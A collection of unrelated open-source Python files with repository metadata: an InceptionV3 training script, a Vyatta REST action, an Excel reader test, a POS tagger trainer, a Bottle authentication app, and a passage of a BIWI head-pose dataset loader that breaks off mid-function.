cabe1b5a299524ea61f815b60a4176bd96d9e707 | 4,439 | py | Python | inception_v3/train.py | littlefisherfisher/models | 11fd89c0b45853e2ca99b86bf1638d5e8fbd9d34 | [
"Apache-2.0"
] | null | null | null | inception_v3/train.py | littlefisherfisher/models | 11fd89c0b45853e2ca99b86bf1638d5e8fbd9d34 | [
"Apache-2.0"
] | null | null | null | inception_v3/train.py | littlefisherfisher/models | 11fd89c0b45853e2ca99b86bf1638d5e8fbd9d34 | [
"Apache-2.0"
] | null | null | null | import oneflow.experimental as flow
import argparse
import numpy as np
import os
import time
from models.inceptionv3 import inception_v3
from utils.ofrecord_data_utils import OFRecordDataLoader
def _parse_args():
parser = argparse.ArgumentParser("flags for train inceptionv3")
parser.add_argument(
"--save_checkpoint_path",
type=str,
default="./checkpoints",
help="save checkpoint root dir",
)
parser.add_argument(
"--load_checkpoint", type=str, default="", help="load checkpoint"
)
parser.add_argument(
"--ofrecord_path", type=str, default="./ofrecord", help="dataset path"
)
# training hyper-parameters
parser.add_argument(
"--learning_rate", type=float, default=0.001, help="learning rate"
)
parser.add_argument("--mom", type=float, default=0.9, help="momentum")
parser.add_argument("--epochs", type=int, default=100, help="training epochs")
parser.add_argument(
"--train_batch_size", type=int, default=32, help="train batch size"
)
parser.add_argument("--val_batch_size", type=int, default=32, help="val batch size")
return parser.parse_args()
def main(args):
flow.enable_eager_execution()
flow.InitEagerGlobalSession()
train_data_loader = OFRecordDataLoader(
ofrecord_root=args.ofrecord_path,
mode="train",
dataset_size=9469,
batch_size=args.train_batch_size,
)
val_data_loader = OFRecordDataLoader(
ofrecord_root=args.ofrecord_path,
mode="val",
dataset_size=3925,
batch_size=args.val_batch_size,
)
# oneflow init
start_t = time.time()
inceptionv3_module = inception_v3()
if args.load_checkpoint != "":
print("load_checkpoint >>>>>>>>> ", args.load_checkpoint)
inceptionv3_module.load_state_dict(flow.load(args.load_checkpoint))
end_t = time.time()
print("init time : {}".format(end_t - start_t))
of_cross_entropy = flow.nn.CrossEntropyLoss()
inceptionv3_module.to("cuda")
of_cross_entropy.to("cuda")
of_sgd = flow.optim.SGD(
inceptionv3_module.parameters(), lr=args.learning_rate, momentum=args.mom
)
of_losses = []
all_samples = len(val_data_loader) * args.val_batch_size
print_interval = 100
for epoch in range(args.epochs):
inceptionv3_module.train()
for b in range(len(train_data_loader)):
image, label = train_data_loader.get_batch()
# oneflow train
start_t = time.time()
image = image.to("cuda")
label = label.to("cuda")
logits, aux = inceptionv3_module(image)
loss = of_cross_entropy(logits, label) + of_cross_entropy(aux, label)
loss.backward()
of_sgd.step()
of_sgd.zero_grad()
end_t = time.time()
if b % print_interval == 0:
l = loss.numpy()[0]
of_losses.append(l)
print(
"epoch {} train iter {} oneflow loss {}, train time : {}".format(
epoch, b, l, end_t - start_t
)
)
print("epoch %d train done, start validation" % epoch)
inceptionv3_module.eval()
correct_of = 0.0
for b in range(len(val_data_loader)):
image, label = val_data_loader.get_batch()
start_t = time.time()
image = image.to("cuda")
with flow.no_grad():
logits, aux = inceptionv3_module(image)
predictions = logits.softmax()
of_predictions = predictions.numpy()
clsidxs = np.argmax(of_predictions, axis=1)
label_nd = label.numpy()
for i in range(args.val_batch_size):
if clsidxs[i] == label_nd[i]:
correct_of += 1
end_t = time.time()
print("epoch %d, oneflow top1 val acc: %f" % (epoch, correct_of / all_samples))
flow.save(
inceptionv3_module.state_dict(),
os.path.join(
args.save_checkpoint_path,
"epoch_%d_val_acc_%f" % (epoch, correct_of / all_samples),
),
)
writer = open("of_losses.txt", "w")
for o in of_losses:
writer.write("%f\n" % o)
writer.close()
if __name__ == "__main__":
args = _parse_args()
main(args)
| 30.613793 | 88 | 0.596756 |
c8d9822bead3281f14c60ff578d4f7e16ee8f80a | 1,502 | py | Python | actions/0_start_cfg.py | StackStorm-Exchange/vyatta | a1b16e425da29e279744bdcbff422d7f481b2424 | [
"Apache-2.0"
] | 3 | 2018-11-20T17:08:00.000Z | 2021-12-13T17:56:16.000Z | actions/0_start_cfg.py | StackStorm-Exchange/vyatta | a1b16e425da29e279744bdcbff422d7f481b2424 | [
"Apache-2.0"
] | 4 | 2017-05-03T16:56:28.000Z | 2021-02-10T21:53:40.000Z | actions/0_start_cfg.py | StackStorm-Exchange/vyatta | a1b16e425da29e279744bdcbff422d7f481b2424 | [
"Apache-2.0"
] | 3 | 2017-05-03T16:06:57.000Z | 2021-01-28T17:48:22.000Z | import requests
import warnings
from st2client.client import Client
from st2common.runners.base_action import Action
class sstartCfg(Action):
def run(self, deviceIP):
# Fetching device credentials based on keys derived from deviceIP
#################################################################
user_key_name = deviceIP + "_user"
pswd_key_name = deviceIP + "_pswd"
client = Client()
try:
user = (client.keys.get_by_name(user_key_name)).value
pswd = (client.keys.get_by_name(pswd_key_name)).value
except Exception:
return (False, "No credentials for : " + deviceIP)
# Preapring the URL request(s)
#################################################################
h = {
"accept": "application/json",
"content-length": "0"
}
url_base = "https://" + deviceIP
url = url_base + "/rest/conf/"
# Sending the URL call(s)
#################################################################
with warnings.catch_warnings():
warnings.simplefilter("ignore")
r = requests.post(url, auth=(user, pswd), headers=h, verify=False)
if r.status_code == 201:
cmd_path = r.headers["Location"]
cmd_path = cmd_path[0:26]
cmd_path = str(cmd_path)
print(cmd_path[0:26])
else:
return (False, "Failed!")
| 34.930233 | 78 | 0.486019 |
26c879f188c56ff6fd2e6ba7ccdf1710b640a4fa | 830 | py | Python | src/test/python/excel/test_excel_reader.py | photowey/pytest-dynamic-framework | 4e7b6d74594191006b50831d42e7aae21e154d56 | [
"Apache-2.0"
] | null | null | null | src/test/python/excel/test_excel_reader.py | photowey/pytest-dynamic-framework | 4e7b6d74594191006b50831d42e7aae21e154d56 | [
"Apache-2.0"
] | null | null | null | src/test/python/excel/test_excel_reader.py | photowey/pytest-dynamic-framework | 4e7b6d74594191006b50831d42e7aae21e154d56 | [
"Apache-2.0"
] | null | null | null | # -*- coding:utf-8 -*-
# ---------------------------------------------
# @file test_excel_reader.py
# @description test_excel_reader
# @author WcJun
# @date 2021/07/31
# ---------------------------------------------
import os
from src.main.python.excel.excel_reader import ExcelReader
class TestExcelReader:
def test_excel_reader(self):
current_path = os.path.abspath(os.path.dirname(__file__))
excel_path = os.path.abspath(os.path.join(current_path, '../../resources/test_excel.xlsx'))
excel_reader = ExcelReader(excel_path)
user_info = excel_reader.read_excel(sheet_name='test_excel')
for item in user_info:
assert len(item) == 4
assert item[0] == '王大锤'
assert item[1] == 2
assert item[2] == 9528
assert item[3] == ''
| 29.642857 | 99 | 0.56506 |
d8f4960084b7cf219088d60cf8c2a24a9d53500a | 12,203 | py | Python | classla/models/tagger.py | clarinsi/classla | 229148f3942ff3428741f4004b7d6643b8a4dc45 | [
"Apache-2.0"
] | 11 | 2021-03-06T07:48:15.000Z | 2022-03-03T13:39:49.000Z | classla/models/tagger.py | clarinsi/classla | 229148f3942ff3428741f4004b7d6643b8a4dc45 | [
"Apache-2.0"
] | 23 | 2021-03-12T13:17:17.000Z | 2022-02-14T08:56:53.000Z | classla/models/tagger.py | clarinsi/classla | 229148f3942ff3428741f4004b7d6643b8a4dc45 | [
"Apache-2.0"
] | 7 | 2021-04-04T15:04:27.000Z | 2022-02-20T17:33:39.000Z | """
Entry point for training and evaluating a POS/morphological features tagger.
This tagger uses highway BiLSTM layers with character and word-level representations, and biaffine classifiers
to produce consistant POS and UFeats predictions.
For details please refer to paper: https://nlp.stanford.edu/pubs/qi2018universal.pdf.
"""
import sys
import os
import shutil
import time
from datetime import datetime
import argparse
import numpy as np
import random
import torch
from torch import nn, optim
from classla.models.pos.data import DataLoader
from classla.models.pos.trainer import Trainer
from classla.models.pos import scorer
from classla.models.common import utils
from classla.models.common.pretrain import Pretrain
from classla.models.common.doc import *
from classla.utils.conll import CoNLL
from classla.models import _training_logging
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str, default='data/pos', help='Root dir for saving models.')
parser.add_argument('--wordvec_dir', type=str, default='extern_data/word2vec', help='Directory of word vectors.')
parser.add_argument('--wordvec_file', type=str, default=None, help='Word vectors filename.')
parser.add_argument('--train_file', type=str, default=None, help='Input file for data loader.')
parser.add_argument('--eval_file', type=str, default=None, help='Input file for data loader.')
parser.add_argument('--output_file', type=str, default=None, help='Output CoNLL-U file.')
parser.add_argument('--gold_file', type=str, default=None, help='Output CoNLL-U file.')
parser.add_argument('--pretrain_file', type=str, default=None, help='Input file containing pretrained data.')
parser.add_argument('--use_lexicon', type=str, default=None, help="Input location of lemmatization model.")
parser.add_argument('--mode', default='train', choices=['train', 'predict'])
parser.add_argument('--lang', type=str, help='Language')
parser.add_argument('--shorthand', type=str, help="Treebank shorthand")
parser.add_argument('--hidden_dim', type=int, default=200)
parser.add_argument('--char_hidden_dim', type=int, default=400)
parser.add_argument('--deep_biaff_hidden_dim', type=int, default=400)
parser.add_argument('--composite_deep_biaff_hidden_dim', type=int, default=100)
parser.add_argument('--word_emb_dim', type=int, default=75)
parser.add_argument('--char_emb_dim', type=int, default=100)
parser.add_argument('--tag_emb_dim', type=int, default=50)
parser.add_argument('--transformed_dim', type=int, default=125)
parser.add_argument('--num_layers', type=int, default=2)
parser.add_argument('--char_num_layers', type=int, default=1)
parser.add_argument('--pretrain_max_vocab', type=int, default=250000)
parser.add_argument('--word_dropout', type=float, default=0.33)
parser.add_argument('--dropout', type=float, default=0.5)
parser.add_argument('--rec_dropout', type=float, default=0, help="Recurrent dropout")
parser.add_argument('--char_rec_dropout', type=float, default=0, help="Recurrent dropout")
parser.add_argument('--no_char', dest='char', action='store_false', help="Turn off character model.")
parser.add_argument('--no_pretrain', dest='pretrain', action='store_false', help="Turn off pretrained embeddings.")
parser.add_argument('--share_hid', action='store_true', help="Share hidden representations for UPOS, XPOS and UFeats.")
parser.set_defaults(share_hid=False)
parser.add_argument('--sample_train', type=float, default=1.0, help='Subsample training data.')
parser.add_argument('--optim', type=str, default='adam', help='sgd, adagrad, adam or adamax.')
parser.add_argument('--lr', type=float, default=3e-3, help='Learning rate')
parser.add_argument('--beta2', type=float, default=0.95)
parser.add_argument('--max_steps', type=int, default=50000)
parser.add_argument('--eval_interval', type=int, default=100)
parser.add_argument('--fix_eval_interval', dest='adapt_eval_interval', action='store_false', \
help="Use fixed evaluation interval for all treebanks, otherwise by default the interval will be increased for larger treebanks.")
parser.add_argument('--max_steps_before_stop', type=int, default=3000)
parser.add_argument('--batch_size', type=int, default=5000)
parser.add_argument('--max_grad_norm', type=float, default=1.0, help='Gradient clipping.')
parser.add_argument('--log_step', type=int, default=20, help='Print log every k steps.')
parser.add_argument('--save_dir', type=str, default='saved_models/pos', help='Root dir for saving models.')
parser.add_argument('--save_name', type=str, default=None, help="File name to save the model")
parser.add_argument('--seed', type=int, default=1234)
parser.add_argument('--cuda', type=bool, default=torch.cuda.is_available())
parser.add_argument('--cpu', action='store_true', help='Ignore CUDA.')
args = parser.parse_args()
return args
def main():
sys.setrecursionlimit(50000)
args = parse_args()
torch.manual_seed(args.seed)
np.random.seed(args.seed)
random.seed(args.seed)
if args.cpu:
args.cuda = False
elif args.cuda:
torch.cuda.manual_seed(args.seed)
args = vars(args)
print("Running tagger in {} mode".format(args['mode']))
if args['mode'] == 'train':
train(args)
else:
evaluate(args)
def train(args):
utils.ensure_dir(args['save_dir'])
model_file = args['save_dir'] + '/' + args['save_name'] if args['save_name'] is not None \
else '{}/{}_tagger.pt'.format(args['save_dir'], args['shorthand'])
# load pretrained vectors
vec_file = args['wordvec_file']
pretrain_file = '{}/{}.pretrain.pt'.format(args['save_dir'], args['shorthand']) if args['pretrain_file'] is None \
else args['pretrain_file']
pretrain = Pretrain(pretrain_file, vec_file, args['pretrain_max_vocab'])
# load data
print("Loading data with batch size {}...".format(args['batch_size']))
doc, metasentences = CoNLL.conll2dict(input_file=args['train_file'])
train_doc = Document(doc, metasentences=metasentences)
train_batch = DataLoader(train_doc, args['batch_size'], args, pretrain, evaluation=False)
vocab = train_batch.vocab
doc, metasentences = CoNLL.conll2dict(input_file=args['eval_file'])
dev_doc = Document(doc, metasentences=metasentences)
dev_batch = DataLoader(dev_doc, args['batch_size'], args, pretrain, vocab=vocab, evaluation=True, sort_during_eval=True)
# pred and gold path
system_pred_file = args['output_file']
gold_file = args['gold_file']
# skip training if the language does not have training or dev data
if len(train_batch) == 0 or len(dev_batch) == 0:
print("Skip training because no data available...")
sys.exit(0)
print("Training tagger...")
trainer = Trainer(args=args, vocab=vocab, pretrain=pretrain, use_cuda=args['cuda'])
global_step = 0
max_steps = args['max_steps']
dev_score_history = []
best_dev_preds = []
current_lr = args['lr']
global_start_time = time.time()
format_str = '{}: step {}/{}, loss = {:.6f} ({:.3f} sec/batch), lr: {:.6f}'
if args['adapt_eval_interval']:
args['eval_interval'] = utils.get_adaptive_eval_interval(dev_batch.num_examples, 2000, args['eval_interval'])
print("Evaluating the model every {} steps...".format(args['eval_interval']))
using_amsgrad = False
last_best_step = 0
# start training
train_loss = 0
while True:
do_break = False
for i, batch in enumerate(train_batch):
start_time = time.time()
global_step += 1
loss = trainer.update(batch, eval=False) # update step
train_loss += loss
if global_step % args['log_step'] == 0:
duration = time.time() - start_time
print(format_str.format(datetime.now().strftime("%Y-%m-%d %H:%M:%S"), global_step,\
max_steps, loss, duration, current_lr))
if global_step % args['eval_interval'] == 0:
# eval on dev
print("Evaluating on dev set...")
dev_preds = []
for batch in dev_batch:
preds = trainer.predict(batch)
dev_preds += preds
dev_preds = utils.unsort(dev_preds, dev_batch.data_orig_idx)
dev_batch.doc.set([UPOS, XPOS, FEATS], [y for x in dev_preds for y in x])
CoNLL.dict2conll(dev_batch.doc.to_dict(), system_pred_file)
_, _, dev_score = scorer.score(system_pred_file, gold_file)
train_loss = train_loss / args['eval_interval'] # avg loss per batch
print("step {}: train_loss = {:.6f}, dev_score = {:.4f}".format(global_step, train_loss, dev_score))
train_loss = 0
# save best model
if len(dev_score_history) == 0 or dev_score > max(dev_score_history):
last_best_step = global_step
trainer.save(model_file)
print("new best model saved.")
best_dev_preds = dev_preds
dev_score_history += [dev_score]
print("")
if global_step - last_best_step >= args['max_steps_before_stop']:
if not using_amsgrad:
print("Switching to AMSGrad")
last_best_step = global_step
using_amsgrad = True
trainer.optimizer = optim.Adam(trainer.model.parameters(), amsgrad=True, lr=args['lr'], betas=(.9, args['beta2']), eps=1e-6)
else:
do_break = True
break
if global_step >= args['max_steps']:
do_break = True
break
if do_break: break
train_batch.reshuffle()
print("Training ended with {} steps.".format(global_step))
best_f, best_eval = max(dev_score_history)*100, np.argmax(dev_score_history)+1
print("Best dev F1 = {:.2f}, at iteration = {}".format(best_f, best_eval * args['eval_interval']))
def evaluate(args):
# file paths
system_pred_file = args['output_file']
gold_file = args['gold_file']
model_file = args['save_dir'] + '/' + args['save_name'] if args['save_name'] is not None \
else '{}/{}_tagger.pt'.format(args['save_dir'], args['shorthand'])
pretrain_file = '{}/{}.pretrain.pt'.format(args['save_dir'], args['shorthand']) if args['pretrain_file'] is None \
else args['pretrain_file']
pretrain = Pretrain(pretrain_file)
# load model
print("Loading model from: {}".format(model_file))
use_cuda = args['cuda'] and not args['cpu']
trainer = Trainer(args=args, pretrain=pretrain, model_file=model_file, use_cuda=use_cuda)
loaded_args, vocab = trainer.args, trainer.vocab
# load config
for k in args:
if k.endswith('_dir') or k.endswith('_file') or k in ['shorthand'] or k == 'mode':
loaded_args[k] = args[k]
# load data
print("Loading data with batch size {}...".format(args['batch_size']))
doc, metasentences = CoNLL.conll2dict(input_file=args['eval_file'])
doc = Document(doc, metasentences=metasentences)
batch = DataLoader(doc, args['batch_size'], loaded_args, pretrain, vocab=vocab, evaluation=True, sort_during_eval=True)
if len(batch) > 0:
print("Start evaluation...")
preds = []
for i, b in enumerate(batch):
preds += trainer.predict(b)
else:
# skip eval if dev data does not exist
preds = []
preds = utils.unsort(preds, batch.data_orig_idx)
# write to file and score
batch.doc.set([UPOS, XPOS, FEATS], [y for x in preds for y in x])
CoNLL.dict2conll(batch.doc.to_dict(), system_pred_file)
if gold_file is not None:
_, _, score = scorer.score(system_pred_file, gold_file)
print("Tagger score:")
print("{} {:.2f}".format(args['shorthand'], score*100))
if __name__ == '__main__':
main()
| 45.533582 | 144 | 0.661559 |
a6b19d4a907ffc7765558217b57ee06b81b3d5d2 | 7,590 | py | Python | auth.py | deb17/regex | fc811a1e42380265986f374598308dc79a0eb88d | [
"MIT"
] | null | null | null | auth.py | deb17/regex | fc811a1e42380265986f374598308dc79a0eb88d | [
"MIT"
] | 1 | 2021-06-01T23:16:37.000Z | 2021-06-01T23:16:37.000Z | auth.py | deb17/regex | fc811a1e42380265986f374598308dc79a0eb88d | [
"MIT"
] | null | null | null | import os
import logging
import bottle
from cork import Cork
from bottle_flash2 import FlashPlugin
# import requests
DATABASE_URL = os.environ['DATABASE_URL']
DBNAME = DATABASE_URL.rsplit('/', 1)[1]
MAILID = os.environ['MAILID']
PASSWORD = os.environ['PASSWORD']
COOKIE_SECRET = os.environ['COOKIE_SECRET']
# SITE_VERIFY_URL = 'https://www.google.com/recaptcha/api/siteverify'
# RECAPTCHA_SECRET = '6LfeHx4UAAAAAFWXGh_xcL0B8vVcXnhn9q_SnQ1b'
logging.basicConfig(format='heroku - - [%(asctime)s] %(message)s',
level=logging.DEBUG)
from cork.backends import SqlAlchemyBackend
if not DATABASE_URL.startswith('postgresql'):
DATABASE_URL = 'postgresql:' + DATABASE_URL.split(':', 1)[1]
sa = SqlAlchemyBackend(DATABASE_URL,
initialize=True,
connect_args={'dbname': DBNAME})
SMTP_URL = ('starttls://' + MAILID + ':' + PASSWORD
+ '@smtp-mail.outlook.com:587')
aaa = Cork(smtp_url=SMTP_URL,
email_sender=MAILID,
backend=sa)
authorize = aaa.make_auth_decorator(fail_redirect="/login", role="user")
app = bottle.Bottle()
app.install(FlashPlugin(secret=COOKIE_SECRET))
def postd():
return bottle.request.forms
def post_get(name, default=''):
return bottle.request.POST.get(name, default).strip()
@bottle.route('/sorry_page')
def sorry_page():
"""Serve sorry page"""
return '<p>Sorry, you are not authorized to perform this action</p>'
@bottle.route('/login')
@bottle.view('login_form')
def login_form():
"""Serve login form"""
if bottle.request.headers.get('X-Forwarded-Proto') == 'http':
newurl = 'https:' + bottle.request.url.split(':', 1)[1]
return bottle.redirect(newurl)
if not aaa.user_is_anonymous:
return bottle.redirect('/home')
session = bottle.request.environ.get('beaker.session')
form = session.get('form', '')
uname = session.get('uname', '')
email = session.get('email', '')
if form:
del session['form']
if uname:
del session['uname']
if email:
del session['email']
session.save()
return {'app': app, 'form': form, 'uname': uname, 'email': email}
@bottle.post('/login')
def login():
"""Authenticate users"""
username = post_get('username')
password = post_get('password')
session = bottle.request.environ.get('beaker.session')
if session.get('pattern'):
url = '/insert'
else:
url = '/home'
session['form'] = 'form1'
session['uname'] = username
session.save()
aaa.login(username, password,
success_redirect=url,
fail_redirect='/temp')
@bottle.route('/temp')
def pass_msg():
app.flash('Invalid username/password.')
return bottle.redirect('/login')
@bottle.route('/user_is_anonymous')
def user_is_anonymous():
if aaa.user_is_anonymous:
return 'True'
return 'False'
@bottle.route('/logout')
def logout():
aaa.logout(success_redirect='/')
def save_form_fields(form, username, email):
session = bottle.request.environ.get('beaker.session')
session['form'] = form
session['uname'] = username
session['email'] = email
session.save()
@bottle.post('/register')
def register():
"""Send out registration email"""
username = post_get('username')
pass1 = post_get('password1')
pass2 = post_get('password2')
email = post_get('email_address')
# token = post_get('g-recaptcha-response')
error = False
if len(username) < 3:
app.flash('Username must have at least 3 characters.')
error = True
if len(pass1) < 8:
app.flash('Password must have at least 8 characters.')
error = True
if pass1 != pass2:
app.flash("Passwords don't match.")
error = True
# token could be blank if there is a delay between checking
# the recaptcha box and clicking submit.
# if not token:
# app.flash('Recaptcha required. Please try again.')
# error = True
# else:
# resp = requests.post(SITE_VERIFY_URL,
# data={'secret': RECAPTCHA_SECRET,
# 'response': token})
# if not resp.json().get('success'):
# app.flash('There was a recaptcha error.')
# error = True
if error:
save_form_fields('form2', username, email)
return bottle.redirect('/login')
try:
aaa.register(username, pass1, email)
except Exception as e:
app.flash(str(e))
save_form_fields('form2', username, email)
return bottle.redirect('/login')
else:
return 'Please check your mailbox.'
@bottle.route('/validate_registration/<registration_code>')
def validate_registration(registration_code):
"""Validate registration, create user account"""
try:
aaa.validate_registration(registration_code)
except Exception as e:
logging.warning(str(e))
return ('<head><title>Register</title></head>'
'<p>This link is invalid.</p>')
else:
return 'Thanks. <a href="/login">Go to login</a>'
@bottle.post('/reset_password')
def send_password_reset_email():
"""Send out password reset email"""
username = post_get('username')
email = post_get('email_address')
try:
aaa.send_password_reset_email(
username=username,
email_addr=email
)
except Exception as e:
app.flash(str(e))
save_form_fields('form3', username, email)
return bottle.redirect('/login')
else:
return 'Please check your mailbox.'
@bottle.route('/change_password/<reset_code>')
@bottle.view('password_change_form')
def change_password(reset_code):
"""Show password change form"""
return dict(reset_code=reset_code, app=app)
@bottle.post('/change_password')
def change_password():
"""Change password"""
password = post_get('password')
reset_code = post_get('reset_code')
if len(password) < 8:
app.flash('Password must have at least 8 characters.')
return bottle.redirect('/change_password/' + reset_code)
aaa.reset_password(reset_code, password)
return ('<head><title>Change password</title></head>'
'Thanks. <a href="/login">Go to login</a>')
# admin views follow
@bottle.route('/admin')
@authorize(role="admin", fail_redirect='/sorry_page')
@bottle.view('admin_page')
def admin():
"""Only admin users can see this"""
#aaa.require(role='admin', fail_redirect='/sorry_page')
return dict(
current_user = aaa.current_user,
users = aaa.list_users(),
roles = aaa.list_roles()
)
@bottle.post('/create_user')
def create_user():
try:
aaa.create_user(postd().username, postd().role, postd().password)
return dict(ok=True, msg='')
except Exception as e:
return dict(ok=False, msg=str(e))
@bottle.post('/delete_user')
def delete_user():
try:
aaa.delete_user(post_get('username'))
return dict(ok=True, msg='')
except Exception as e:
print(e)
return dict(ok=False, msg=str(e))
@bottle.post('/create_role')
def create_role():
try:
aaa.create_role(post_get('role'), post_get('level'))
return dict(ok=True, msg='')
except Exception as e:
return dict(ok=False, msg=str(e))
@bottle.post('/delete_role')
def delete_role():
try:
aaa.delete_role(post_get('role'))
return dict(ok=True, msg='')
except Exception as e:
return dict(ok=False, msg=str(e))
| 27.302158 | 73 | 0.630698 |
8b80f590bb4b9c70fe8ec91f61a66dcc5010dc7c | 823 | py | Python | clustertop/__init__.py | rossdylan/clustertop | 996471bdfec956a2e12b723081c00fea91815bf2 | [
"MIT"
] | 2 | 2015-05-09T02:54:43.000Z | 2017-06-26T20:59:24.000Z | clustertop/__init__.py | rossdylan/clustertop | 996471bdfec956a2e12b723081c00fea91815bf2 | [
"MIT"
] | null | null | null | clustertop/__init__.py | rossdylan/clustertop | 996471bdfec956a2e12b723081c00fea91815bf2 | [
"MIT"
] | null | null | null | from clustertop.poller import Poller
from ConfigParser import ConfigParser
import argparse
import importlib
def main():
parser = argparse.ArgumentParser(
description='Control the cluster top backend')
parser.add_argument('command', choices=['check', 'run'])
parser.add_argument('--config', type=str, default='/etc/clustertop')
args = parser.parse_args()
cf = ConfigParser()
cf.read(args.config)
the_poller = Poller
if cf.has_option('main', 'poller'):
mod_path, cls = cf.get('main', 'poller').split(':')
module = importlib.import_module(mod_path)
the_poller = getattr(module, cls)
if args.command == 'run':
poller = the_poller(cf)
poller.poll_loop()
elif args.command == 'check':
poller = the_poller(cf)
poller.poll()
| 31.653846 | 72 | 0.654921 |
f8b5821c054b709898f5ad3da055fce69d97980e | 11,746 | py | Python | DeepRL_For_HPE/DatasetHandler/BiwiBrowser.py | muratcancicek/Deep_RL_For_Head_Pose_Est | b3436a61a44d20d8bcfd1341792e0533e3ff9fc2 | [
"Apache-2.0"
] | null | null | null | DeepRL_For_HPE/DatasetHandler/BiwiBrowser.py | muratcancicek/Deep_RL_For_Head_Pose_Est | b3436a61a44d20d8bcfd1341792e0533e3ff9fc2 | [
"Apache-2.0"
] | null | null | null | DeepRL_For_HPE/DatasetHandler/BiwiBrowser.py | muratcancicek/Deep_RL_For_Head_Pose_Est | b3436a61a44d20d8bcfd1341792e0533e3ff9fc2 | [
"Apache-2.0"
] | null | null | null | # Author: Muratcan Cicek, https://users.soe.ucsc.edu/~cicekm/
import os
if 'COMPUTERNAME' in os.environ:
if os.environ['COMPUTERNAME'] == "MSI3":
os.environ['KERAS_BACKEND'] = 'theano'
os.environ['MKL_THREADING_LAYER'] = 'GNU'
# Dirty importing that allows the main author to switch environments easily
if '.' in __name__:
from DatasetHandler.NeighborFolderimporter import *
from DatasetHandler.BiwiTarBrowser import *
else:
from NeighborFolderimporter import *
from BiwiTarBrowser import *
from keras.applications import vgg16
from sklearn.preprocessing import MinMaxScaler, scale
from keras.preprocessing import image
from matplotlib import pyplot
from os import listdir
import itertools
import datetime
import tarfile
import struct
import random
import numpy
import png
import cv2
import os
random.seed(7)
importNeighborFolders()
from paths import *
#################### Constants ####################
pwd = os.path.abspath(os.path.dirname(__file__))
BIWI_Data_folder = BIWI_Main_Folder + 'hpdb/'
BIWI_SnippedData_folder = pwd + '/BIWI_Files/BIWI_Samples/hpdb/'.replace('/', os.path.sep)
BIWI_Lebels_file = BIWI_Main_Folder + 'db_annotations.tgz'
BIWI_Lebels_file_Local = pwd + '/BIWI_Files/db_annotations.tgz'.replace('/', os.path.sep)
BIWI_Frame_Shape = (480, 640, 3)
Target_Frame_Shape_VGG16 = (240, 320, 3)
def now(): return str(datetime.datetime.now())
label_rescaling_factor = 100
BIWI_Subject_IDs = ['XX', 'F01', 'F02', 'F03', 'F04', 'F05', 'F06', 'M01', 'M02', 'M03', 'M04', 'M05', 'M06', 'M07', 'M08', 'F03', 'M09', 'M10', 'F05', 'M11', 'M12', 'F02', 'M01', 'M13', 'M14']
BIWI_Lebel_Scalers = getAnnoScalers(tarFile = BIWI_Lebels_file)
#################### Frame Reading ####################
def getRGBpngFileName(subject, frame):
return str(subject).zfill(2) + '/frame_' + str(frame).zfill(5) + '_rgb.png'
def pngObjToNpArr(imagePath):
img = image.load_img(imagePath, target_size = Target_Frame_Shape_VGG16)
x = image.img_to_array(img)
x = x[8:-8, 48:-48, :]#[14:-15, 74:-75, :]
return vgg16.preprocess_input(x)
def getBIWIFrameAsNpArr(subject, frame, dataFolder = BIWI_Data_folder, preprocess_input = None):
imagePath = dataFolder + getRGBpngFileName(subject, frame)
if preprocess_input == None:
return pngObjToNpArr(imagePath)
else:
return preprocess_input(imagePath)
def filterFrameNamesForSubj(subject, dataFolder):
subjectFolder = str(subject).zfill(2) + os.path.sep
allNames = os.listdir(dataFolder + subjectFolder)
frameNamesForSubj = (fn for fn in allNames if '_rgb.png' in fn)
frameKey = lambda n: str(subject).zfill(2) + '/' + n[:-8]
absolutePath = lambda n: dataFolder + subjectFolder + n
frameNamesForSubj = ((frameKey(n), absolutePath(n)) for n in sorted(frameNamesForSubj))
return frameNamesForSubj
def getAllFramesForSubj(subject, dataFolder = BIWI_Data_folder, preprocess_input = None):
frameNamesForSubj = filterFrameNamesForSubj(subject, dataFolder)
#print('Subject ' + str(subject).zfill(2) + '\'s frames have been started to read ' + now())
if preprocess_input == None: preprocess_input = pngObjToNpArr
frames = ((n, preprocess_input(framePath)) for n, framePath in frameNamesForSubj)
#print('Subject ' + str(subject).zfill(2) + '\'s all frames have been read by ' + now())
return frames
def getSubjectsListFromFolder(dataFolder):
allNames = [n for n in os.listdir(dataFolder)]
allNames = set([n[:2] for n in allNames])
names = []
for n in allNames:
try:
names.append(int(n[-2:]))
except ValueError:
continue
return sorted(names)
def readBIWI_Frames(dataFolder = BIWI_Data_folder, subjectList = None, preprocess_input = None):
#print('Frames from ' + str(dataFolder) + ' have been started to read by ' + now())
biwiFrames = {}
if subjectList == None: subjectList = getSubjectsListFromFolder(dataFolder)
for subj in subjectList:
frames = getAllFramesForSubj(subj, dataFolder, preprocess_input = preprocess_input)
biwiFrames[subj] = frames
return biwiFrames
def showSampleFrames(count = 10, preprocess_input = None):
biwiFrames = readBIWI_Frames(dataFolder = BIWI_SnippedData_folder, preprocess_input = preprocess_input)
for subj, frames in biwiFrames.items():
frames = [(n, f) for n, f in sorted(frames, key=lambda x: x[0])]
for name, frame in frames[:count]:
print(frame.shape)
pyplot.imshow(numpy.rollaxis(frame, 0, 3))
pyplot.title(name)
pyplot.show()
#################### Merging ####################
def scaleX(arr):
return new_arr
def scaleY(arr):
new_arr = arr/label_rescaling_factor#+100
return new_arr
def rolling_window(m, timesteps):
shape = (m.shape[0] - timesteps + 1, timesteps) + m.shape[1:]
strides = (m.strides[0],) + m.strides
return numpy.lib.stride_tricks.as_strided(m, shape=shape, strides=strides)
def reshaper(m, l, timesteps, overlapping):
if overlapping:
m= rolling_window(m, timesteps)
l = l[timesteps-1:]
else:
wasted = (m.shape[0] % timesteps)
m, l = m[wasted:], l[wasted:]
m = m.reshape((int(m.shape[0]/timesteps), timesteps, m.shape[1], m.shape[2], m.shape[3]))
l = l.reshape((int(l.shape[0]/timesteps), timesteps, l.shape[1]))
l = l[:, -1, :]
return m, l
def labelFramesForSubj(frames, annos, timesteps = None, overlapping = False, scaling = True, scalers = None):
frames = {n: f for n, f in frames}
keys = sorted(frames & annos.keys())
inputMatrix = numpy.stack(itemgetter(*keys)(frames))
labels = numpy.stack(itemgetter(*keys)(annos))
if scaling: # scaleX()
#inputMatrix, labels = inputMatrix, scaleY(labels)
if scalers != None: labels = scaleAnnoByScalers(labels, scalers)
if timesteps != None:
inputMatrix, labels = reshaper(inputMatrix, labels, timesteps, overlapping)
return inputMatrix, labels
